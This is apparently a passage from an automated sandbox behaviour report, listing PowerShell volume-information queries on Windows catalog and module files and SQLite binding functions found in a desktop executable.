Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E1307A sqlite3_transfer_bindings, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D5E6 sqlite3_bind_int64, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D595 sqlite3_bind_double, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E0B431 sqlite3_clear_bindings, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E037F3 sqlite3_value_frombind, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D781 sqlite3_bind_zeroblob64, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D714 sqlite3_bind_zeroblob, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D68C sqlite3_bind_pointer, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D65B sqlite3_bind_null, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D635 sqlite3_bind_int, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D9B0 sqlite3_bind_value, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D981 sqlite3_bind_text16, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D945 sqlite3_bind_text64, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D916 sqlite3_bind_text, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D8E7 sqlite3_bind_blob64, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E038CA sqlite3_bind_parameter_count, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E158CA sqlite3_bind_parameter_index, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E038DC sqlite3_bind_parameter_name, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D8B8 sqlite3_bind_blob, |